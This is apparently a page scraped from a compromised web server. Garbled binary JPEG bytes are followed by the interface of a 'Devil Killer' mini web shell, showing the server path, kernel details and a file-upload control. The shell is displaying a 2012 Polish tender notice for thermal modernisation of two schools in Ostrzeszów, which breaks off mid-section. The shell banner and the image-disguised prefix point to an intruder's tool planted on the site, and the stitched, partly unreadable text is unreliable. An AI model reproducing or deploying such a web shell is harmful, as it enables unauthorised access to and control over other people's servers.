JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120608/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120608/193118-N-2012.html

<p class="kh_header"><b>Ostrzeszów: Przetarg nieograniczony na wykonanie robót budowlanych
w związku z projektem 
pn. Termomodernizacja budynku Szkoły Podstawowej nr 1 i Gimnazjum nr 1
 oraz budynku Szkoły Podstawowej nr 2 w Ostrzeszowie
nr UDA-RPWP.03.02.02-30-001-11-00
współfinansowanego z Europejskiego Funduszu Rozwoju Regionalnego w ramach:
Priorytetu III. Środowisko Przyrodnicze
Działania 3.2 Infrastruktura energetyczna przyjazna środowisku
Schematu 2 
Termomodernizacja obiektów użyteczności publicznej, w tym system grzewczy
 Wielkopolskiego Regionalnego Programu Operacyjnego na lata 2007-2013</b><br>
<b>Numer ogłoszenia: 193118 - 2012; data zamieszczenia: 08.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Obsługi Placówek Oświatowych , ul. Zamkowa 31, 63-500 Ostrzeszów, woj. wielkopolskie, tel. 062 7320678, faks 062 7320679.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na wykonanie robót budowlanych
w związku z projektem 
pn. Termomodernizacja budynku Szkoły Podstawowej nr 1 i Gimnazjum nr 1
 oraz budynku Szkoły Podstawowej nr 2 w Ostrzeszowie
nr UDA-RPWP.03.02.02-30-001-11-00
współfinansowanego z Europejskiego Funduszu Rozwoju Regionalnego w ramach:
Priorytetu III. Środowisko Przyrodnicze
Działania 3.2 Infrastruktura energetyczna przyjazna środowisku
Schematu 2 
Termomodernizacja obiektów użyteczności publicznej, w tym system grzewczy
 Wielkopolskiego Regionalnego Programu Operacyjnego na lata 2007-2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy opis wykonania zamówienia zawiera niniejsza specyfikacja istotnych warunków zamówienia wraz z załącznikami tj. dokumentacją projektową i specyfikacją wykonania i odbioru robót. Dokumentacja projektowa znajduje się do wglądu w siedzibie zamawiającego.                                            Na stronie internetowej UMiG  www.ostrzeszow.nowoczesnagmina.pl zamieszono scany dokumentacji projektowej.  Cały zakres przedmiotu zamówienia należy wykonać zgodnie z przedstawioną dokumentacją                    techniczno - projektową znajdującą się do wglądu w siedzibie zamawiającego oraz na stronie internetowej wskazanej powyżej. Przedstawione w niniejszej dokumentacji kosztorysy nakładcze i przedmiary robót oraz pliki w formacie ath. stanowią dokumenty pomocnicze i nie są podstawą do sposobu obliczenia ceny. 
Część robót budowlanych prowadzona będzie w okresie roku szkolnego, w związku z powyższym zaleca się ich wykonanie w większym zakresie w okresie wakacyjnym lub w sposób gwarantujący bezkolizyjne funkcjonowanie szkoły w okresie roku szkolnego. 
Zamawiający żąda wskazania przez wykonawcę w ofercie (zgodnie z zał. nr 1 do siwz) części zamówienia, której wykonanie zamierza powierzyć podwykonawcom. Wykonawca może powierzyć wykonanie zamówienia podwykonawcom w zakresie części przedmiotu zamówienia, tj. wykonania instalacji solarnej oraz robót branży sanitarnej i elektrycznej. Ze względu na specyfikę przedmiotu zamówienia Zamawiający                                    zastrzega  nie dopuszcza udziału podwykonawców w pozostałej części zamówienia.                       

Zamawiający dopuszcza składanie ofert częściowych. 
Oferty częściowe można składać na następujące zakresy robót:

CZĘŚĆ 1 = ZADANIE NR 1 
Roboty ogólnobudowlane związane z termomodernizacją budynku Szkoły Podstawowej nr 1                            i Gimnazjum nr 1 w Ostrzeszowie przy ul. Łąkowej 1.

CZĘŚĆ 2 = ZADANIE NR 2 
Roboty ogólnobudowlane związane z termomodernizacją budynku Szkoły Podstawowej nr 2 w Ostrzeszowie przy ul. Piastowskiej 3.

Zamawiający nie dopuszcza realizacji zamówień uzupełniających.  
Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.
Zamawiający żąda wskazania przez wykonawcę w ofercie części zamówienia, której wykonanie zamierza powierzyć podwykonawcom.

Wspólny Słownik Zamówień:  kod CPV 45000000-7 roboty budowlane. 

Wykonawca robót zobowiązany będzie do przestrzegania warunków i wytycznych dotyczących realizacji Projektu w ramach którego współfinansowane będzie niniejsze zamówienie publiczne. 


Część 1 - Zadanie nr 1 
Klasyfikacja robót wg. Wspólnego Słownika Zamówień

45000000-7 Roboty budowlane -Roboty związane z wykonaniem ocieplenia - Budynek Szkoly
45321000-3 Izolacja cieplna - ocieplenie ścian budynku SP-1 i gimnazjum nr 1
45111000-8 Roboty w zakresie burzenia, roboty ziemne - Rozbiórka komina
45000000-7 Roboty budowlane - Roboty związane z wykonaniem ocieplenia- sale sportowe i łącznik
45321000-3 Izolacja cieplna- Docieplenie ścian
45261000-4 Wykonywanie pokryć konstrukcji dachowych oraz podobne roboty - Roboty demontażowe
45261000-4 Wykonywanie pokryć konstrukcji dachowych oraz podobne roboty- Dach pokrycie
45311200-2 Roboty w zakresie instalacji elektrycznych - instalacja odgromowa
45421130-4 Instalowanie okien i drzwi
34953300-5 Chodniki -Wykonanie utwardzenia kostka betonowa

1.Opis robót: 

1.1. Nazwa zadania:
Termomodernizacja budynku Szkoły Podstawowej nr 1 i Gimnazjum nr 1
oraz sal gimnastycznych dla zadania nr UDA-RPWP.03.02.02-30-001-11-00 współfinansowanego                                  z Europejskiego Funduszu Rozwoju Regionalnego w ramach:
Priorytetu III. Środowisko Przyrodnicze, Działania 3.2 Infrastruktura energetyczna przyjazna środowisku, Schematu 2 - Termomodernizacja obiektów użyteczności publicznej, w tym system grzewczy  Wielkopolskiego Regionalnego Programu Operacyjnego na lata 2007-2013.

1.2. Przedmiot i zakres robót: 

Przedmiotem zamówienia jest wykonanie ocieplania budynku szkoły i sal gimnastycznych wraz z wykonaniem elewacji , ocieplenia dachu sal gimnastycznych ,wymiany stolarki drzwiowej zewnętrznej i częściowo okiennej oraz robót  koniecznych związanych z wykonaniem ww prac. 

1.2.1  Prace do wykonania w zakresie termomodernizacji ścian
 
-	Oczyszczenie powierzchni ścian z  naprawami tynków
-	Częściowa rozbiórka muru ogniowego oraz naprawa na sali niskiej od strony północnej do wysokości pokrycia dachu (stan zagrażający bezpieczeństwu)  
-	Demontaż i ponowny montaż instalacji odgromowej na ścianach z wymianą haków oraz pomiarami skuteczności zerowania i oporności
-	Wymiana parapetów zewnętrznych na parapety z blachy powlekanej gr 0,50  z zaokrągleniem krawędzi przy oknach parteru
-	Demontaż i ponowny montaż rur spustowych z likwidacją żeliwnych  końcówek rur spustowych i wymianą na PCV fi 12 oraz montaż rewizji rynnowych
-	Zamurowanie 2 szt okien  na łączniku przy schodach od strony  boiska
-	Wymiana daszków nad wejściami szt 2 na daszki z blachy  powlekanej  wraz z nową konstrukcją wsporczą.
-	Wymiana obróbek blacharskich na ścianach szczytowych w związku ze zmianą grubości ściany (obróbki ogniomurów) ,
-	Wykonanie utwardzenia terenu kostką betonową gr. 8 cm z wykonaniem koryta i warstw podkładowych z betonu B-10 gr 12 cm i warstwą stabilizacyjną gr. 10 cm oraz odwodnienia - koryta odwadniającego w postaci obniżonej o 2 cm kostki i odprowadzeniem wody do kanalizacji.
-	Ocieplenie ścian należy wykonać metodą lekką mokrą zgodnie z Instrukcją ITB Nr 334-2002  Bezspoinowy system ocieplania ścian zewnętrznych budynków.
Dla realizacji, należy w zakresie wyboru zaprawy klejącej, wyprawy tynkarskiej i
środków gruntujących przyjąć system jednego producenta - (wyprawa akrylowej barwiona).
Na budynku szkoły listwa cokołowa  aluminiowa.
Docieplenie ścian styropianem  gr 14 cm( ściany gr. 38 cm) i 18 cm ( sale gimnastyczne - ściany gr 51 cm) o współczynniku lambda = 0,04(W-m*K)  Szczegółowe  grubości docieplenia ścian pokazano na załączonych rysunkach
Kołkowanie płyt styropianowych:
Liczba łączników ( kołków) na 1 m2 powierzchni - 9 szt.
Głębokość kotwienia w ścianie - min. 60 mm
Przyklejanie siatki z włókna szklanego na zaprawie systemowej
W narożnikach wszystkich otworów elewacyjnych umieścić zatapiając je w           
warstwie klejowej
ukośnie pod kątem 45 stopni dodatkowe paski z siatki z włókna szklanego. Wymiary paska 250 * 350mm. Na powierzchnię płyt izolacyjnych nanieść ciągłą warstwą masę klejową, grubość warstwy ok. 3 mm. Po nałożeniu masy przykleić siatkę zbrojącą całkowicie wciskając ją w warstwę klejową. W celu całkowitego przykrycia siatki zbrojącej ponownie nanieść warstwę masy klejowej ok. 1mm.
Całkowita grubość warstwy zbrojącej po stwardnieniu powinna wynosić ok. 3mm.
Opis systemu ocieplenia metodą BSO:

W skład systemu wchodzą:
- płyta styropianowa mocowana klejem i dodatkowo kołkami,
- siatka z włókna szklanego wtopiona w tynk zbrojeniowy,
- tynk zbrojeniowy,
- powłoka końcowa - elastyczny tynk na bazie żywic syntetycznych,
- element dodatkowy - profil narożnikowy z siatki pancernej do wzmocnienia naroży budynku i uzbrojenia ościeży okiennych i drzwiowych.
Temperatura zewnętrzna, w których wykonuje się  prace docieplenia ścian zewnętrznych nie powinna być
niższa niż 5°C. Podczas prac należy przestrzegać technologii wykonania podanej przez
producenta wybranego systemu.
Do wykonywania izolacji stosować materiały w stanie powietrzno-suchym.
Warstwy izolacyjne winny być układane szczególnie starannie. Płyty styropianowe należy
układać na styk bez szczelin. W przypadku powstania szczelin należy je wypełnić pianką poliuretanową.
Płyty winny być przycięte na miarę bez ubytków i wyszczerbień.
Przy układaniu płyt w kilku warstwach każdą warstwę układać mijankowo. Przesunięcie styków winno wynosić minimum 3 cm.
Przy wykonywaniu ocieplenia ścian warstwowych płyty powinny być wbudowywane w czasie
wznoszenia ścian. Należy wykonać 50 cm wysokości jednej warstwy ściany, zmontować płyty a następnie wykonać drugą warstwę ściany.
Wykonanie elewacji tynkiem akrylowym (tynki  zacierane ręcznie) 
Wykonanie cokołu elewacji tynkiem żywicznym (tynki  zacierane ręcznie)
Uporządkowanie terenu  po wykonanych pracach.
1.2.2  Prace do wykonania w zakresie wymiany stolarki

-	Wymiana  10 szt okien w sali niższej od strony południowej na okna PCV z nawietrznikami wg załączonych rysunków ( okna 154 x 74 cm uchylne)
-	Wymiana wszystkich drzwi wejściowych na drzwi  wykonane z aluminium ocieplane poliuretanem. (W części  drzwi z szyby bezpieczne) Rysunki drzwi w dokumentacji .
-	Częściowe zamurowanie otworu drzwiowego w sali gimnastycznej od strony wschodniej .
-	Podmurowanie okien  w Sali niskiej od strony południowej( 10 szt)








  1.2.3  Prace do wykonania w zakresie termomodernizacji dachu
-     wymiana instalacji odgromowej na ścianach sal gimnastycznych i zaplecza	
      skuteczności zerowania      
-	Zerwanie starych warstw papy wraz z oczyszczeniem podłoża
-	zagruntowanie preparatem modyfikowanym do gruntowania podłoża  pod papy termiczne  lub innym preparatem o równoważnych parametrach technicznych
-	Rozbiórka  obróbek blacharskich , rynien i rur spustowych dachu oraz gzymsów

-	Wykonanie ocielenia płytami warstwowymi ze styropianu gr 22 cm jednostronnie pokrytych papą na kleju oraz dyblowanie do podłoża
     ( styropian o współczynniku lambda = 0,04(W-m*K) . 
       Przy pasach nadrynnowych zastosować płyty ścięte.
-	Wykonanie pokrycia z papy termozgrzewalnej  z wentylacjami - papa o układzie jednowarstwowym   
-	Zdemontowanie starych rynien i rur spustowych i wykonanie nowych fi 15, rur spustowych fi 12 z blachy ocynkowanej z wymianą końcówek rur spustowych z żeliwa na PCV +  czyszczaki
-	Wykonanie nowych obróbek blacharskich murów ogniowych z blachy powlekanej
-	Oczyszczenie i pomalowanie wentylacji dachowych

     1.2.4  Rozbiórka komina
	- istniejący komin należy rozebrać ręcznie zaczynając od góry , po rozbiórce 
	  uzupełnić tynk na ścianie i zutylizować gruz.

Kody PCV  - 45331000-6 Instalacja solarna ( instalowanie urządzeń grzewczych)

Roboty, których dotyczy specyfikacja, obejmują wszystkie czynności umożliwiające i mające na celu wykonanie instalacji kolektorów słonecznych. Niniejsza specyfikacja techniczna związana jest z wykonaniem niżej wymienionych robót: 
Roboty montażowe: 
1. Montaż kolektorów słonecznych (7 szt. o łącznej powierzchni 16,24m2), na dachu budynku przynależnego do szkoły. Posadowienie zasobników CWU, podłączenie zasobników solarnych CWU do istniejącej instalacji CWU. 
2. Wykonanie rurociągów solarnych łączących kolektory z zasobnikami. 
3. Montaż grupy pompowej solarnej . 
4. Wykonanie prób ciśnienia Instalacji CWU. 
5. Napełnienie Instalacji solarnej czynnikiem solarnym. 
6. Wykonanie prób ciśnienia Instalacji solarnej. 
7. Montaż regulatora solarnego i czujników temperatury. 
8. Programowanie regulatora. 
9. Uruchomienie Instalacji. 
Rodzaje występujących robót: 
1. Roboty montażowe 
2. Roboty instalacyjne 
Roboty prowadzone będą w pomieszczeniu w piwnicy (węźle cieplnym i pomieszczeniu magazynowym) i na części dachu zgodnie z rysunkami rozmieszczenia kolektorów i zasobników solarnych z dokumentacji technicznej. 
Wykonawca jest odpowiedzialny za jakość prac i ich zgodność z dokumentacją techniczną, specyfikacjami technicznymi i instrukcjami zarządzającego realizacją umowy. Wykonawca jest zobowiązany wykonywać wszystkie roboty ściśle według otrzymanej dokumentacji technicznej. 








Część 2 - Zadanie nr 2

Klasyfikacja robót wg. Wspólnego Słownika Zamówień

45000000-7 Roboty budowlane - roboty  związane z wykonaniem ocieplenia ścian
45321000-3 Izolacja cieplna - ocieplenie ścian budynku 
45261000-4 Wykonywanie pokryć konstrukcji dachowych oraz podobne roboty - docieplenie stropodachu
45421130-4 Instalowanie okien i drzwi - stolarka drzwiowa

1.Opis robót : 

1.1. Nazwa zadania
Termomodernizacja budynku Szkoły Podstawowej nr 2
dla zadania nr UDA-RPWP.03.02.02-30-001-11-00 współfinansowanego z Europejskiego Funduszu Rozwoju Regionalnego w ramach:
Priorytetu III. Środowisko Przyrodnicze, Działania 3.2 Infrastruktura energetyczna przyjazna środowisku, Schematu 2 - Termomodernizacja obiektów użyteczności publicznej, w tym system grzewczy  Wielkopolskiego Regionalnego Programu Operacyjnego na lata 2007-2013.
	
1.2. Przedmiot i zakres robót : 

Przedmiotem zamówienia jest wykonanie ocieplania budynku szkoły wraz z wykonaniem elewacji , ocieplenie stropodachu  , wymiany stolarki drzwiowej zewnętrznej oraz robót  koniecznych związanych z wykonaniem ww prac.

     1.2.1  Prace do wykonania w zakresie termomodernizacji ścian
 
-	Oczyszczenie powierzchni ścian, skucie wykładziny z płytek elewacyjnych (pomiędzy oknami)  z uzupełnieniem i z  naprawami tynków
-	Demontaż i ponowny montaż instalacji odgromowej na ścianach z wymianą haków oraz pomiarami skuteczności zerowania i oporności , wymiana instalacji odgromowej dachu
-	Wymiana parapetów zewnętrznych na parapety z blachy powlekanej gr 0,50  z zaokrągleniem krawędzi przy oknach parteru
-	Demontaż istniejących rynien i rur spustowych
-	Demontaż istniejących obróbek blacharskich murów ogniowych i wykonanie nowych z blachy powlekanej gr 0,50 mm
-	Wymianę kratek wentylacyjnych w ścianie szczytowej ( pod stropodachem)

- Ocieplenie ścian należy wykonać metodą lekką mokrą zgodnie z Instrukcją ITB Nr 334-2002  Bezspoinowy system ocieplania ścian zewnętrznych budynków.
Dla realizacji, należy w zakresie wyboru zaprawy klejącej, wyprawy tynkarskiej i
środków gruntujących przyjąć system jednego producenta. 
Na budynku szkoły   listwa cokołowa aluminiowa

Docieplenie ścian styropianem  gr 14  i 15 cm o współczynniku lambda = 0,04(W-m*K)  Szczegółowe  grubości docieplenia ścian pokazano na załączonych rysunkach
Kołkowanie płyt styropianowych:
Liczba łączników ( kołków) na 1 m2 powierzchni - 9 szt.
Głębokość kotwienia w ścianie - min. 60 mm



Opis docieplenia ścian

W skład systemu wchodzą:
- płyta styropianowa mocowana klejem i dodatkowo kołkami,
- siatka z włókna szklanego wtopiona w tynk zbrojeniowy,
- tynk zbrojeniowy,
- powłoka końcowa - elastyczny tynk akrylowy,
- element dodatkowy - profil narożnikowy z siatki pancernej do wzmocnienia naroży budynku i uzbrojenia ościeży okiennych i drzwiowych.
Temperatura zewnętrzna, w których wykonuje docieplenie ścian zewnętrznych nie powinna być
niższa niż 5°C. Podczas prac należy przestrzegać technologii wykonania podanej przez
producenta wybranego systemu.
Do wykonywania izolacji stosować materiały w stanie powietrzno-suchym.
Warstwy izolacyjne winny być układane szczególnie starannie. Płyty styropianowe należy
układać na styk bez szczelin.
Płyty winny być przycięte na miarę bez ubytków i wyszczerbień.
Przy układaniu płyt w kilku warstwach każdą warstwę układać mijankowo. Przesunięcie styków winno wynosić minimum 3 cm.
Przy wykonywaniu ocieplenia ścian warstwowych płyty powinny być wbudowywane w czasie
wznoszenia ścian. Należy wykonać 50 cm wysokości jednej warstwy ściany, zmontować płyty a następnie wykonać drugą warstwę ściany.

Przyklejanie siatki z włókna szklanego na zaprawie systemowej
W narożnikach otworów elewacyjnych umieścić zatapiając je w warstwie klejowej
ukośnie pod kątem 45 stopni dodatkowe paski z siatki z włókna szklanego. Wymiary paska 250 * 350mm. Na powierzchnię płyt izolacyjnych nanieść ciągłą warstwą masę klejową, grubość warstwy ok. 3 mm. Po nałożeniu masy przykleić siatkę zbrojącą całkowicie wciskając ją w warstwę klejową. W celu całkowitego przykrycia siatki zbrojącej ponownie nanieść warstwę masy klejowej ok. 1mm.
Całkowita grubość warstwy zbrojącej po stwardnieniu powinna wynosić ok. 3mm.


-	Wymiana obróbek blacharskich na ścianach szczytowych i ścianie frontowej oraz pasa podrynowego w związku ze zmianą grubości ściany(obróbki ogniomurów , pas  nadrynnowy)
-	Wykonanie elewacji tynkiem akrylowym (tynki  zacierane ręcznie) 
Wykonanie cokołu elewacji tynkiem żywicznym (tynki  zacierane ręcznie)
  -     uporządkowanie terenu po wykonanych pracach, wywóz śmieci.
  -     wymiana instalacji odgromowej na ścianach sal gimnastycznych i zaplecza	
  -    Wymiana kratek wentylacyjnych zabezpieczonych siatkami     

 1.2.2  Prace do wykonania w zakresie wymiany stolarki

-	Wymiana wszystkich drzwi wejściowych na drzwi  wykonane z aluminium ocieplane poliuretanem z naświetlami - szyba bezpieczna K-1,0 W(m*K). 
-	Rysunki drzwi w dokumentacji .





 1.2.3  Prace do wykonania w zakresie termomodernizacji dachu

-     Wymiana instalacji odgromowej w raz z pomiarami 
      skuteczności zerowania      
-    Wykonanie ocielenia wełną mineralną o WSP  min 0.04 W-m*K.
      Wykucie otworów technologicznych w dachu 
      Wdmuchiwanie lub układanie warstwy ocieplającej
                 grubość układanej termoizolacji powinna wynosić nie mniej niż 120 mm grubość
      określona w dokumentacji projektowej, 
                 Termoizolacja powinna być ułożona równą warstwą bez przerw i ubytków, tzw.
                  kieszeni.
                  Maksymalna wilgotność granulatu może wynosić nie więcej niż 2%.
      Termoizolacja nie może zatykać otworów wentylacyjnych.
      Zamknięcie otworów technologicznych i zabezpieczenie przed przeciekaniem
-	zagruntowanie preparatem modyfikowanym Simplast do gruntowania podłoża  pod papy termiczne  lub innym preparatem o równoważnych parametrach technicznych
-	Wykonanie nowego pokrycia z papy termozgrzewalnej  z wentylacjami - papa o układzie jednowarstwowym   wraz z obróbką kominów .papą i zakończeniem obróbki z blachy powlekanej.
-	Zdemontowanie starych rynien i rur spustowych i wykonanie nowych fi 15, rur spustowych fi 12 z blachy ocynkowanej z wymianą końcówek rur spustowych z żeliwa na PCV +  czyszczaki
-	Wykonanie nowych obróbek blacharskich murów ogniowych i pasa podrynnowego z blachy powlekanej.
-	Oczyszczenie i zagruntowanie kominów emulsją 
-	Obróbka kominów blacha powlekaną

Wykonawca robót jest odpowiedzialny za jakość ich wykonania oraz za ich zgodność z niniejszą specyfikacją techniczną, obowiązującymi normami, dokumentacją techniczną i zaleceniami Zamawiającego.

Kody PCV  - 45331000-6 Instalacja solarna ( instalowanie urządzeń grzewczych)

Roboty, których dotyczy specyfikacja, obejmują wszystkie czynności umożliwiające i mające na celu wykonanie instalacji kolektorów słonecznych. Niniejsza specyfikacja techniczna związana jest z wykonaniem niżej wymienionych robót: 
Roboty montażowe: 
1. Montaż kolektorów słonecznych (6 szt. o łącznej powierzchni 13,92m2), na dachu budynku przynależnego do szkoły. Posadowienie zasobników CWU, podłączenie zasobników solarnych CWU do istniejącej instalacji CWU. 
2. Wykonanie rurociągów solarnych łączących kolektory z zasobnikami. 
3. Montaż grupy pompowej solarnej . 
4. Wykonanie prób ciśnienia Instalacji CWU. 
5. Napełnienie Instalacji solarnej czynnikiem solarnym. 
6. Wykonanie prób ciśnienia Instalacji solarnej. 
7. Montaż regulatora solarnego i czujników temperatury. 
8. Programowanie regulatora. 
9. Uruchomienie Instalacji. 
Rodzaje występujących robót: 
1. Roboty montażowe 
2. Roboty instalacyjne 
Roboty prowadzone będą w pomieszczeniu w piwnicy (pomieszczenie kotłowni) i na części dachu zgodnie z rysunkami rozmieszczenia kolektorów i zasobników solarnych z dokumentacji technicznej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.32.10.00-3, 45.11.10.00-8, 45.32.10.00-3, 45.26.10.00-4, 45.31.12.00-2, 45.42.11.30-4, 34.95.33.00-5, 45.33.10.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 26.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający żąda od wykonawców wniesienia wadium w wysokości:
a)	dla Zadania nr 1 -  20.000 zł. (słownie: dwadzieścia tysięcy tysięcy złotych).
b)	dla Zadania nr 2 - 10.000 zł. (słownie: dziesięć tysięcy tysięcy złotych).
2.	Wadium należy wnieść przed terminem upływu składania ofert i załączyć dowód jego wniesienia w ofercie.  W przypadku składania oferty na daną część zamówienia tj. zadania 1 lub 2 - należy wnieść wadium                      w wysokości wskazanej do danego zadania, jeśli zaś wykonawca składa ofertę na zadanie nr 1 i nr 2 - winien wnieść wadium w łącznej wysokości 30.000 zł. (słownie: trzydzieści tysięcy tysięcy złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby niniejszego zamówienia nie wymaga posiadania przez wykonawcę szczególnie specjalnych uprawnień;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
